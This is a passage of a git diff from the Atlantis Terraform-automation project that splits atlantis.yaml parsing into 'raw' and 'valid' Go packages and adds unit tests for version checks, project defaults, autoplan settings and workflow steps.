StepType: "apply", -// }, -// }, -// }, -// }, -// }, -// }, -// }, -// { -// description: "if a plan or apply explicitly defines an empty steps key then there are no steps", -// input: ` -//version: 2 -//projects: -//- dir: "." -//workflows: -// default: -// plan: -// steps: -// apply: -// steps: -//`, -// expOutput: yaml.Spec{ -// Version: 2, -// Projects: basicProjects, -// Workflows: map[string]yaml.Workflow{ -// "default": { -// Plan: &yaml.Stage{ -// Steps: nil, -// }, -// Apply: &yaml.Stage{ -// Steps: nil, -// }, -// }, -// }, -// }, -// }, -// { -// description: "if steps are set then we parse them properly", -// input: ` -//version: 2 -//projects: -//- dir: "." -//workflows: -// default: -// plan: -// steps: -// - init -// - plan -// apply: -// steps: -// - plan # we don't validate if they make sense -// - apply -//`, -// expOutput: yaml.Spec{ -// Version: 2, -// Projects: basicProjects, -// Workflows: map[string]yaml.Workflow{ -// "default": { -// Plan: &yaml.Stage{ -// Steps: []yaml.Step{ -// { -// StepType: "init", -// }, -// { -// StepType: "plan", -// }, -// }, -// }, -// Apply: &yaml.Stage{ -// Steps: []yaml.Step{ -// { -// StepType: "plan", -// }, -// { -// StepType: "apply", -// }, -// }, -// }, -// }, -// }, -// }, -// }, -// { -// description: "we parse extra_args for the steps", -// input: ` -//version: 2 -//projects: -//- dir: "." -//workflows: -// default: -// plan: -// steps: -// - init: -// extra_args: [] -// - plan: -// extra_args: -// - arg1 -// - arg2 -// apply: -// steps: -// - plan: -// extra_args: [a, b] -// - apply: -// extra_args: ["a", "b"] -//`, -// expOutput: yaml.Spec{ -// Version: 2, -// Projects: basicProjects, -// Workflows: map[string]yaml.Workflow{ -// "default": { -// Plan: &yaml.Stage{ -// Steps: []yaml.Step{ -// { -// StepType: "init", -// ExtraArgs: []string{}, -// }, -// { -// StepType: "plan", -// ExtraArgs: []string{"arg1", "arg2"}, -// }, -// }, -// }, -// Apply: &yaml.Stage{ -// Steps: []yaml.Step{ -// { -// StepType: "plan", -// ExtraArgs: []string{"a", "b"}, -// }, -// { -// StepType: "apply", -// ExtraArgs: []string{"a", "b"}, -// }, -// }, -// }, -// }, -// }, -// }, -// }, -// { -// description: "custom steps are parsed", -// input: ` -//version: 2 -//projects: -//- dir: "." -//workflows: -// default: -// plan: -// steps: -// - run: "echo \"plan hi\"" -// apply: -// steps: -// - run: echo apply "arg 2" -//`, -// expOutput: yaml.Spec{ -// Version: 2, -// Projects: basicProjects, -// Workflows: map[string]yaml.Workflow{ -// "default": { -// Plan: &yaml.Stage{ -// Steps: []yaml.Step{ -// { -// StepType: "run", -// Run: []string{"echo", "plan hi"}, -// }, -// }, -// }, -// Apply: &yaml.Stage{ -// Steps: []yaml.Step{ -// { -// StepType: "run", -// Run: []string{"echo", "apply", "arg 2"}, -// }, -// }, -// }, -// }, -// }, -// }, -// }, -// } -// -// tmpDir, cleanup := TempDir(t) -// defer cleanup() -// -// for _, c := range cases { -// t.Run(c.description, func(t *testing.T) { -// err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) -// Ok(t, err) -// -// r := yaml.ParserValidator{} -// act, err := r.ReadConfig(tmpDir) -// Ok(t, err) -// Equals(t, c.expOutput, act) -// }) -// } -//} +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml" + "github.com/runatlantis/atlantis/server/events/yaml/valid" + . "github.com/runatlantis/atlantis/testing" +) + +func TestReadConfig_DirDoesNotExist(t *testing.T) { + r := yaml.ParserValidator{} + _, err := r.ReadConfig("/not/exist") + Assert(t, os.IsNotExist(err), "exp nil ptr") +} + +func TestReadConfig_FileDoesNotExist(t *testing.T) { + tmpDir, cleanup := TempDir(t) + defer cleanup() + + r := yaml.ParserValidator{} + _, err := r.ReadConfig(tmpDir) + Assert(t, os.IsNotExist(err), "exp nil ptr") +} + +func TestReadConfig_BadPermissions(t *testing.T) { + tmpDir, cleanup := TempDir(t) + defer cleanup() + err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000) + Ok(t, err) + + r := yaml.ParserValidator{} + _, err = r.ReadConfig(tmpDir) + ErrContains(t, "unable to read atlantis.yaml file: ", err) +} + +func TestReadConfig_UnmarshalErrors(t *testing.T) { + // We only have a few cases here because we assume the YAML library to be + // well tested. See https://github.com/go-yaml/yaml/blob/v2/decode_test.go#L810. + cases := []struct { + description string + input string + expErr string + }{ + { + "random characters", + "slkjds", + "parsing atlantis.yaml: yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `slkjds` into raw.Spec", + }, + { + "just a colon", + ":", + "parsing atlantis.yaml: yaml: did not find expected key", + }, + } + + tmpDir, cleanup := TempDir(t) + defer cleanup() + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) + Ok(t, err) + r := yaml.ParserValidator{} + _, err = r.ReadConfig(tmpDir) + ErrEquals(t, c.expErr, err) + }) + } +} + +func TestReadConfig(t *testing.T) { + cases := []struct { + description string + input string + expErr string + exp valid.Spec + }{ + // Version key. + { + description: "no version", + input: ` +projects: +- dir: "." +`, + expErr: "version: is required.", + }, + { + description: "unsupported version", + input: ` +version: 0 +projects: +- dir: "." +`, + expErr: "version: must equal 2.", + }, + { + description: "empty version", + input: ` +version: ~ +projects: +- dir: "." +`, + expErr: "version: must equal 2.", + }, + + // Projects key. + { + description: "empty projects list", + input: ` +version: 2 +projects:`, + exp: valid.Spec{ + Version: 2, + Projects: nil, + Workflows: map[string]valid.Workflow{}, + }, + }, + { + description: "project dir not set", + input: ` +version: 2 +projects: +- `, + expErr: "projects: (0: (dir: cannot be blank.).).", + }, + { + description: "project dir set", + input: ` +version: 2 +projects: +- dir: .`, + exp: valid.Spec{ + Version: 2, + Projects: []valid.Project{ + { + Dir: ".", + Workspace: "default", + Workflow: nil, + TerraformVersion: nil, + Autoplan: valid.Autoplan{ + WhenModified: []string{"**/*.tf"}, + Enabled: true, + }, + ApplyRequirements: nil, + }, + }, + Workflows: map[string]valid.Workflow{}, + }, + }, + { + description: "project fields set except autoplan", + input: ` +version: 2 +projects: +- dir: . + workspace: myworkspace + terraform_version: v0.11.0 + apply_requirements: [approved] + workflow: myworkflow +workflows: + myworkflow: ~`, + exp: valid.Spec{ + Version: 2, + Projects: []valid.Project{ + { + Dir: ".", + Workspace: "myworkspace", + Workflow: String("myworkflow"), + TerraformVersion: String("v0.11.0"), + Autoplan: valid.Autoplan{ + WhenModified: []string{"**/*.tf"}, + Enabled: true, + }, + ApplyRequirements: []string{"approved"}, + }, + }, + Workflows: map[string]valid.Workflow{ + "myworkflow": {}, + }, + }, + }, + { + description: "project field with autoplan", + input: ` +version: 2 +projects: +- dir: . + workspace: myworkspace + terraform_version: v0.11.0 + apply_requirements: [approved] + workflow: myworkflow + autoplan: + enabled: false +workflows: + myworkflow: ~`, + exp: valid.Spec{ + Version: 2, + Projects: []valid.Project{ + { + Dir: ".", + Workspace: "myworkspace", + Workflow: String("myworkflow"), + TerraformVersion: String("v0.11.0"), + Autoplan: valid.Autoplan{ + WhenModified: []string{"**/*.tf"}, + Enabled: false, + }, + ApplyRequirements: []string{"approved"}, + }, + }, + Workflows: map[string]valid.Workflow{ + "myworkflow": {}, + }, + }, + }, + { + description: "project dir with ..", + input: ` +version: 2 +projects: +- dir: ..`, + expErr: "projects: (0: (dir: cannot contain '..'.).).", + }, + + // Project must have dir set. + { + description: "project with no config", + input: ` +version: 2 +projects: +-`, + expErr: "projects: (0: (dir: cannot be blank.).).", + }, + { + description: "project with no config at index 1", + input: ` +version: 2 +projects: +- dir: "." +-`, + expErr: "projects: (1: (dir: cannot be blank.).).", + }, + { + description: "project with unknown key", + input: ` +version: 2 +projects: +- unknown: value`, + expErr: "yaml: unmarshal errors:\n line 4: field unknown not found in struct raw.Project", + }, + { + description: "referencing workflow that doesn't exist", + input: ` +version: 2 +projects: +- dir: . + workflow: undefined`, + expErr: "workflow \"undefined\" is not defined", + }, + } + + tmpDir, cleanup := TempDir(t) + defer cleanup() + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) + Ok(t, err) + + r := yaml.ParserValidator{} + act, err := r.ReadConfig(tmpDir) + if c.expErr != "" { + ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err) + return + } + Ok(t, err) + Equals(t, c.exp, act) + }) + } +} + +func TestReadConfig_Successes(t *testing.T) { + basicProjects := []valid.Project{ + { + Autoplan: valid.Autoplan{ + Enabled: true, + WhenModified: []string{"**/*.tf"}, + }, + Workspace: "default", + ApplyRequirements: nil, + Dir: ".", + }, + } + + cases := []struct { + description string + input string + expOutput valid.Spec + }{ + { + description: "uses project defaults", + input: ` +version: 2 +projects: +- dir: "."`, + expOutput: valid.Spec{ + Version: 2, + Projects: basicProjects, + Workflows: make(map[string]valid.Workflow), + }, + }, + { + description: "autoplan is enabled by default", + input: ` +version: 2 +projects: +- dir: "." + autoplan: + when_modified: ["**/*.tf"] +`, + expOutput: valid.Spec{ + Version: 2, + Projects: basicProjects, + Workflows: make(map[string]valid.Workflow), + }, + }, + { + description: "if workflows not defined there are none", + input: ` +version: 2 +projects: +- dir: "." +`, + expOutput: valid.Spec{ + Version: 2, + Projects: basicProjects, + Workflows: make(map[string]valid.Workflow), + }, + }, + { + description: "if workflows key set but with no workflows there are none", + input: ` +version: 2 +projects: +- dir: "." +workflows: ~ +`, + expOutput: valid.Spec{ + Version: 2, + Projects: basicProjects, + Workflows: make(map[string]valid.Workflow), + }, + }, + { + description: "if a plan or apply explicitly defines an empty steps key then there are no steps", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + apply: + steps: +`, + expOutput: valid.Spec{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]valid.Workflow{ + "default": { + Plan: &valid.Stage{ + Steps: nil, + }, + Apply: &valid.Stage{ + Steps: nil, + }, + }, + }, + }, + }, + { + description: "if steps are set then we parse them properly", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - init + - plan + apply: + steps: + - plan # we don't validate if they make sense + - apply +`, + expOutput: valid.Spec{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]valid.Workflow{ + "default": { + Plan: &valid.Stage{ + Steps: []valid.Step{ + { + StepName: "init", + }, + { + StepName: "plan", + }, + }, + }, + Apply: &valid.Stage{ + Steps: []valid.Step{ + { + StepName: "plan", + }, + { + StepName: "apply", + }, + }, + }, + }, + }, + }, + }, + { + description: "we parse extra_args for the steps", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - init: + extra_args: [] + - plan: + extra_args: + - arg1 + - arg2 + apply: + steps: + - plan: + extra_args: [a, b] + - apply: + extra_args: ["a", "b"] +`, + expOutput: valid.Spec{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]valid.Workflow{ + "default": { + Plan: &valid.Stage{ + Steps: []valid.Step{ + { + StepName: "init", + ExtraArgs: []string{}, + }, + { + StepName: "plan", + ExtraArgs: []string{"arg1", "arg2"}, + }, + }, + }, + Apply: &valid.Stage{ + Steps: []valid.Step{ + { + StepName: "plan", + ExtraArgs: []string{"a", "b"}, + }, + { + StepName: "apply", + ExtraArgs: []string{"a", "b"}, + }, + }, + }, + }, + }, + }, + }, + { + description: "custom steps are parsed", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - run: "echo \"plan hi\"" + apply: + steps: + - run: echo apply "arg 2" +`, + expOutput: valid.Spec{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]valid.Workflow{ + "default": { + Plan: &valid.Stage{ + Steps: []valid.Step{ + { + StepName: "run", + RunCommand: []string{"echo", "plan hi"}, + }, + }, + }, + Apply: &valid.Stage{ + Steps: []valid.Step{ + { + StepName: "run", + RunCommand: []string{"echo", "apply", "arg 2"}, + }, + }, + }, + }, + }, + }, + }, + } + + tmpDir, cleanup := TempDir(t) + defer cleanup() + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) + Ok(t, err) + + r := yaml.ParserValidator{} + act, err := r.ReadConfig(tmpDir) + Ok(t, err) + Equals(t, c.expOutput, act) + }) + } +} + +// Bool is a helper routine that allocates a new bool value +// to store v and returns a pointer to it. +func Bool(v bool) *bool { return &v } + +// Int is a helper routine that allocates a new int value +// to store v and returns a pointer to it. +func Int(v int) *int { return &v } + +// String is a helper routine that allocates a new string value +// to store v and returns a pointer to it. +func String(v string) *string { return &v } diff --git a/server/events/yaml/project.go b/server/events/yaml/project.go deleted file mode 100644 index d6d7e89e6d..0000000000 --- a/server/events/yaml/project.go +++ /dev/null @@ -1,10 +0,0 @@ -package yaml - -type Project struct { - Dir *string `yaml:"dir,omitempty"` - Workspace *string `yaml:"workspace,omitempty"` - Workflow *string `yaml:"workflow,omitempty"` - TerraformVersion *string `yaml:"terraform_version,omitempty"` - AutoPlan *AutoPlan `yaml:"auto_plan,omitempty"` - ApplyRequirements []string `yaml:"apply_requirements,omitempty"` -} diff --git a/server/events/yaml/project_test.go b/server/events/yaml/project_test.go deleted file mode 100644 index 0827bee733..0000000000 --- a/server/events/yaml/project_test.go +++ /dev/null @@ -1,63 +0,0 @@ -package yaml_test - -import ( - "testing" - - "github.com/runatlantis/atlantis/server/events/yaml" - . "github.com/runatlantis/atlantis/testing" - yamlv2 "gopkg.in/yaml.v2" -) - -func TestProject_UnmarshalYAML(t *testing.T) { - cases := []struct { - description string - input string - exp yaml.Project - }{ - { - description: "omit unset fields", - input: "", - exp: yaml.Project{ - Dir: nil, - Workspace: nil, - Workflow: nil, - TerraformVersion: nil, - AutoPlan: nil, - ApplyRequirements: nil, - }, - }, - { - description: "all fields set", - input: ` -dir: mydir -workspace: workspace -workflow: workflow -terraform_version: v0.11.0 -auto_plan: - when_modified: [] - enabled: false -apply_requirements: -- mergeable`, - exp: yaml.Project{ - Dir: String("mydir"), - Workspace: String("workspace"), - Workflow: String("workflow"), - TerraformVersion: String("v0.11.0"), - AutoPlan: &yaml.AutoPlan{ - WhenModified: []string{}, - Enabled: Bool(false), - }, - ApplyRequirements: []string{"mergeable"}, - }, - }, - } - - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - var p yaml.Project - err := yamlv2.UnmarshalStrict([]byte(c.input), &p) - Ok(t, err) - Equals(t, c.exp, p) - }) - } -} diff --git a/server/events/yaml/raw/autoplan.go b/server/events/yaml/raw/autoplan.go new file mode 100644 index 0000000000..00222d1631 --- /dev/null +++ b/server/events/yaml/raw/autoplan.go @@ -0,0 +1,39 @@ +package raw + +import "github.com/runatlantis/atlantis/server/events/yaml/valid" + +const DefaultAutoPlanWhenModified = "**/*.tf" +const DefaultAutoPlanEnabled = true + +type Autoplan struct { + WhenModified []string `yaml:"when_modified,omitempty"` + Enabled *bool `yaml:"enabled,omitempty"` +} + +func (a Autoplan) ToValid() valid.Autoplan { + var v valid.Autoplan + if a.WhenModified == nil { + v.WhenModified = []string{DefaultAutoPlanWhenModified} + } else { + v.WhenModified = a.WhenModified + } + + if a.Enabled == nil { + v.Enabled = true + } else { + v.Enabled = *a.Enabled + } + + return v +} + +func (a Autoplan) Validate() error { + return nil +} + +func DefaultAutoPlan() valid.Autoplan { + return valid.Autoplan{ + WhenModified: []string{DefaultAutoPlanWhenModified}, + Enabled: DefaultAutoPlanEnabled, + } +} diff --git a/server/events/yaml/raw/autoplan_test.go b/server/events/yaml/raw/autoplan_test.go new file mode 100644 index 0000000000..43b85a0143 --- /dev/null +++ b/server/events/yaml/raw/autoplan_test.go @@ -0,0 +1,151 @@ +package raw_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml/raw" + "github.com/runatlantis/atlantis/server/events/yaml/valid" + . "github.com/runatlantis/atlantis/testing" + "gopkg.in/yaml.v2" +) + +func TestAutoPlan_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp raw.Autoplan + }{ + { + description: "omit unset fields", + input: "", + exp: raw.Autoplan{ + Enabled: nil, + WhenModified: nil, + }, + }, + { + description: "all fields set", + input: ` +enabled: true +when_modified: ["something-else"] +`, + exp: raw.Autoplan{ + Enabled: Bool(true), + WhenModified: []string{"something-else"}, + }, + }, + { + description: "enabled false", + input: ` +enabled: false +when_modified: ["something-else"] +`, + exp: raw.Autoplan{ + Enabled: Bool(false), + WhenModified: []string{"something-else"}, + }, + }, + { + description: "modified elem empty", + input: ` +enabled: false +when_modified: +- +`, + exp: raw.Autoplan{ + Enabled: Bool(false), + WhenModified: []string{""}, + }, + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var a raw.Autoplan + err := yaml.UnmarshalStrict([]byte(c.input), &a) + Ok(t, err) + Equals(t, c.exp, a) + }) + } +} + +func TestAutoplan_Validate(t *testing.T) { + cases := []struct { + description string + input raw.Autoplan + }{ + { + description: "nothing set", + input: raw.Autoplan{}, + }, + { + description: "when_modified empty", + input: raw.Autoplan{ + WhenModified: []string{}, + }, + }, + { + description: "enabled false", + input: raw.Autoplan{ + Enabled: Bool(false), + }, + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + Ok(t, c.input.Validate()) + }) + } +} + +func TestAutoplan_ToValid(t *testing.T) { + cases := []struct { + description string + input raw.Autoplan + exp valid.Autoplan + }{ + { + description: "nothing set", + input: raw.Autoplan{}, + exp: valid.Autoplan{ + Enabled: true, + WhenModified: []string{"**/*.tf"}, + }, + }, + { + description: "when modified empty", + input: raw.Autoplan{ + WhenModified: []string{}, + }, + exp: valid.Autoplan{ + Enabled: true, + WhenModified: []string{}, + }, + }, + { + description: "enabled false", + input: raw.Autoplan{ + Enabled: Bool(false), + }, + exp: valid.Autoplan{ + Enabled: false, + WhenModified: []string{"**/*.tf"}, + }, + }, + { + description: "enabled true", + input: raw.Autoplan{ + Enabled: Bool(true), + }, + exp: valid.Autoplan{ + Enabled: true, + WhenModified: []string{"**/*.tf"}, + }, + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + Equals(t, c.exp, c.input.ToValid()) + }) + } +} diff --git a/server/events/yaml/raw/project.go b/server/events/yaml/raw/project.go new file mode 100644 index 0000000000..be9ce1980b --- /dev/null +++ b/server/events/yaml/raw/project.go @@ -0,0 +1,70 @@ +package raw + +import ( + "errors" + "fmt" + "strings" + + "github.com/go-ozzo/ozzo-validation" + "github.com/runatlantis/atlantis/server/events/yaml/valid" +) + +const ( + DefaultWorkspace = "default" + ApprovedApplyRequirement = "approved" +) + +type Project struct { + Dir *string `yaml:"dir,omitempty"` + Workspace *string `yaml:"workspace,omitempty"` + Workflow *string `yaml:"workflow,omitempty"` + TerraformVersion *string `yaml:"terraform_version,omitempty"` + Autoplan *Autoplan `yaml:"autoplan,omitempty"` + ApplyRequirements []string `yaml:"apply_requirements,omitempty"` +} + +func (p Project) Validate() error { + hasDotDot := func(value interface{}) error { + if strings.Contains(*value.(*string), "..") { + return errors.New("cannot contain '..'") + } + return nil + } + validApplyReq := func(value interface{}) error { + reqs := value.([]string) + for _, r := range reqs { + if r != ApprovedApplyRequirement { + return fmt.Errorf("%q not supported, only %s is supported", r, ApprovedApplyRequirement) + } + } + return nil + } + return validation.ValidateStruct(&p, + validation.Field(&p.Dir, validation.Required, validation.By(hasDotDot)), + validation.Field(&p.ApplyRequirements, validation.By(validApplyReq)), + ) +} + +func (p Project) ToValid() valid.Project { + var v valid.Project + v.Dir = *p.Dir + + if p.Workspace == nil { + v.Workspace = DefaultWorkspace + } else { + v.Workspace = *p.Workspace + } + + v.Workflow = p.Workflow + v.TerraformVersion = p.TerraformVersion + if p.Autoplan == nil { + v.Autoplan = DefaultAutoPlan() + } else { + v.Autoplan = p.Autoplan.ToValid() + } + + // There are no default apply requirements. + v.ApplyRequirements = p.ApplyRequirements + + return v +} diff --git a/server/events/yaml/raw/project_test.go b/server/events/yaml/raw/project_test.go new file mode 100644 index 0000000000..9c06914896 --- /dev/null +++ b/server/events/yaml/raw/project_test.go @@ -0,0 +1,178 @@ +package raw_test + +import ( + "testing" + + "github.com/go-ozzo/ozzo-validation" + "github.com/runatlantis/atlantis/server/events/yaml/raw" + "github.com/runatlantis/atlantis/server/events/yaml/valid" + . "github.com/runatlantis/atlantis/testing" + "gopkg.in/yaml.v2" +) + +func TestProject_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp raw.Project + }{ + { + description: "omit unset fields", + input: "", + exp: raw.Project{ + Dir: nil, + Workspace: nil, + Workflow: nil, + TerraformVersion: nil, + Autoplan: nil, + ApplyRequirements: nil, + }, + }, + { + description: "all fields set", + input: ` +dir: mydir +workspace: workspace +workflow: workflow +terraform_version: v0.11.0 +autoplan: + when_modified: [] + enabled: false +apply_requirements: +- mergeable`, + exp: raw.Project{ + Dir: String("mydir"), + Workspace: String("workspace"), + Workflow: String("workflow"), + TerraformVersion: String("v0.11.0"), + Autoplan: &raw.Autoplan{ + WhenModified: []string{}, + Enabled: Bool(false), + }, + ApplyRequirements: []string{"mergeable"}, + }, + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var p raw.Project + err := yaml.UnmarshalStrict([]byte(c.input), &p) + Ok(t, err) + Equals(t, c.exp, p) + }) + } +} + +func TestProject_Validate(t *testing.T) { + cases := []struct { + description string + input raw.Project + expErr string + }{ + { + description: "minimal fields", + input: raw.Project{ + Dir: String("."), + }, + expErr: "", + }, + { + description: "dir empty", + input: raw.Project{ + Dir: nil, + }, + expErr: "dir: cannot be blank.", + }, + { + description: "dir with ..", + input: raw.Project{ + Dir: String("../mydir"), + }, + expErr: "dir: cannot contain '..'.", + }, + { + description: "apply reqs with unsupported", + input: raw.Project{ + Dir: String("."), + ApplyRequirements: []string{"unsupported"}, + }, + expErr: "apply_requirements: \"unsupported\" not supported, only approved is supported.", + }, + { + description: "apply reqs with valid", + input: raw.Project{ + Dir: String("."), + ApplyRequirements: []string{"approved"}, + }, + expErr: "", + }, + } + validation.ErrorTag = "yaml" + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + err := c.input.Validate() + if c.expErr == "" { + Ok(t, err) + } else { + ErrEquals(t, c.expErr, err) + } + }) + } +} + +func TestProject_ToValid(t *testing.T) { + cases := []struct { + description string + input raw.Project + exp valid.Project + }{ + { + description: "minimal values", + input: raw.Project{ + Dir: String("."), + }, + exp: valid.Project{ + Dir: ".", + Workspace: "default", + Workflow: nil, + TerraformVersion: nil, + Autoplan: valid.Autoplan{ + WhenModified: []string{"**/*.tf"}, + Enabled: true, + }, + ApplyRequirements: nil, + }, + }, + { + description: "all set", + input: raw.Project{ + Dir: String("."), + Workspace: String("myworkspace"), + Workflow: String("myworkflow"), + TerraformVersion: String("v0.11.0"), + Autoplan: &raw.Autoplan{ + WhenModified: []string{"hi"}, + Enabled: Bool(false), + }, + ApplyRequirements: []string{"approved"}, + }, + exp: valid.Project{ + Dir: ".", + Workspace: "myworkspace", + Workflow: String("myworkflow"), + TerraformVersion: String("v0.11.0"), + Autoplan: valid.Autoplan{ + WhenModified: []string{"hi"}, + Enabled: false, + }, + ApplyRequirements: []string{"approved"}, + }, + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + Equals(t, c.exp, c.input.ToValid()) + }) + } +} diff --git a/server/events/yaml/raw/raw.go b/server/events/yaml/raw/raw.go new file mode 100644 index 0000000000..0d93ef71c4 --- /dev/null +++ b/server/events/yaml/raw/raw.go @@ -0,0 +1,4 @@ +// Package raw contains the golang representations of the YAML elements +// supported in atlantis.yaml. It is called raw because no validation has +// been done yet at this stage. +package raw diff --git a/server/events/yaml/yaml_test.go b/server/events/yaml/raw/raw_test.go similarity index 95% rename from server/events/yaml/yaml_test.go rename to server/events/yaml/raw/raw_test.go index c82dd3486b..e0f43fac6d 100644 --- a/server/events/yaml/yaml_test.go +++ b/server/events/yaml/raw/raw_test.go @@ -1,4 +1,4 @@ -package yaml_test +package raw_test // Bool is a helper routine that allocates a new bool value // to store v and returns a pointer to it. diff --git a/server/events/yaml/raw/spec.go b/server/events/yaml/raw/spec.go new file mode 100644 index 0000000000..aaebc05f33 --- /dev/null +++ b/server/events/yaml/raw/spec.go @@ -0,0 +1,45 @@ +package raw + +import ( + "errors" + + "github.com/go-ozzo/ozzo-validation" + "github.com/runatlantis/atlantis/server/events/yaml/valid" +) + +type Spec struct { + Version *int `yaml:"version,omitempty"` + Projects []Project `yaml:"projects,omitempty"` + Workflows map[string]Workflow `yaml:"workflows,omitempty"` +} + +func (s Spec) Validate() error { + equals2 := func(value interface{}) error { + if *value.(*int) != 2 { + return errors.New("must equal 2") + } + return nil + } + return validation.ValidateStruct(&s, + validation.Field(&s.Version, validation.NotNil, validation.By(equals2)), + validation.Field(&s.Projects), + validation.Field(&s.Workflows), + ) +} + +func (s Spec) ToValid() valid.Spec { + var validProjects []valid.Project + for _, p := range s.Projects { + validProjects = append(validProjects, p.ToValid()) + } + + validWorkflows := make(map[string]valid.Workflow) + for k, v := range s.Workflows { + validWorkflows[k] = v.ToValid() + } + return valid.Spec{ + Version: *s.Version, + Projects: validProjects, + Workflows: validWorkflows, + } +} diff --git a/server/events/yaml/raw/spec_test.go b/server/events/yaml/raw/spec_test.go new file mode 100644 index 0000000000..d7b83e53de --- /dev/null +++ b/server/events/yaml/raw/spec_test.go @@ -0,0 +1,268 @@ +package raw_test + +import ( + "testing" + + "github.com/go-ozzo/ozzo-validation" + "github.com/runatlantis/atlantis/server/events/yaml/raw" + "github.com/runatlantis/atlantis/server/events/yaml/valid" + . "github.com/runatlantis/atlantis/testing" + "gopkg.in/yaml.v2" +) + +func TestSpec_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp raw.Spec + expErr string + }{ + { + description: "no data", + input: "", + exp: raw.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + }, + { + description: "yaml nil", + input: "~", + exp: raw.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + }, + { + description: "invalid key", + input: "invalid: key", + exp: raw.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + expErr: "yaml: unmarshal errors:\n line 1: field invalid not found in struct raw.Spec", + }, + { + description: "version set", + input: "version: 2", + exp: raw.Spec{ + Version: Int(2), + Projects: nil, + Workflows: nil, + }, + }, + { + description: "projects key without value", + input: "projects:", + exp: raw.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + }, + { + description: "workflows key without value", + input: "workflows:", + exp: raw.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + }, + { + description: "projects with a map", + input: "projects:\n key: value", + exp: raw.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + expErr: "yaml: unmarshal errors:\n line 2: cannot unmarshal !!map into []raw.Project", + }, + { + description: "projects with a scalar", + input: "projects: value", + exp: raw.Spec{ + Version: nil, + Projects: nil, + Workflows: nil, + }, + expErr: "yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `value` into []raw.Project", + }, + { + description: "should use values if set", + input: ` +version: 2 +projects: +- dir: mydir + workspace: myworkspace + workflow: default + terraform_version: v0.11.0 + autoplan: + enabled: false + when_modified: [] + apply_requirements: [mergeable] +workflows: + default: + plan: + steps: [] + apply: + steps: []`, + exp: raw.Spec{ + Version: Int(2), + Projects: []raw.Project{ + { + Dir: String("mydir"), + Workspace: String("myworkspace"), + Workflow: String("default"), + TerraformVersion: String("v0.11.0"), + Autoplan: &raw.Autoplan{ + WhenModified: []string{}, + Enabled: Bool(false), + }, + ApplyRequirements: []string{"mergeable"}, + }, + }, + Workflows: map[string]raw.Workflow{ + "default": { + Apply: &raw.Stage{ + Steps: []raw.Step{}, + }, + Plan: &raw.Stage{ + Steps: []raw.Step{}, + }, + }, + }, + }, + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var conf raw.Spec + err := yaml.UnmarshalStrict([]byte(c.input), &conf) + if c.expErr != "" { + ErrEquals(t, c.expErr, err) + return + } + Ok(t, err) + Equals(t, c.exp, conf) + }) + } +} + +func TestSpec_Validate(t *testing.T) { + cases := []struct { + description string + input raw.Spec + expErr string + }{} + validation.ErrorTag = "yaml" + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + err := c.input.Validate() + if c.expErr == "" { + Ok(t, err) + } else { + ErrEquals(t, c.expErr, err) + } + }) + } +} + +func TestSpec_ToValid(t *testing.T) { + cases := []struct { + description string + input raw.Spec + exp valid.Spec + }{ + { + description: "nothing set", + input: raw.Spec{Version: Int(2)}, + exp: valid.Spec{ + Version: 2, + Workflows: make(map[string]valid.Workflow), + }, + }, + { + description: "set to empty", + input: raw.Spec{ + Version: Int(2), + Workflows: map[string]raw.Workflow{}, + Projects: []raw.Project{}, + }, + exp: valid.Spec{ + Version: 2, + Workflows: map[string]valid.Workflow{}, + Projects: nil, + }, + }, + { + description: "everything set", + input: raw.Spec{ + Version: Int(2), + Workflows: map[string]raw.Workflow{ + "myworkflow": { + Apply: &raw.Stage{ + Steps: []raw.Step{ + { + Key: String("apply"), + }, + }, + }, + Plan: &raw.Stage{ + Steps: []raw.Step{ + { + Key: String("init"), + }, + }, + }, + }, + }, + Projects: []raw.Project{ + { + Dir: String("mydir"), + }, + }, + }, + exp: valid.Spec{ + Version: 2, + Workflows: map[string]valid.Workflow{ + "myworkflow": { + Apply: &valid.Stage{ + Steps: []valid.Step{ + { + StepName: "apply", + }, + }, + }, + Plan: &valid.Stage{ + Steps: []valid.Step{ + { + StepName: "init", + }, + }, + }, + }, + }, + Projects: []valid.Project{ + { + Dir: "mydir", + Workspace: "default", + Autoplan: 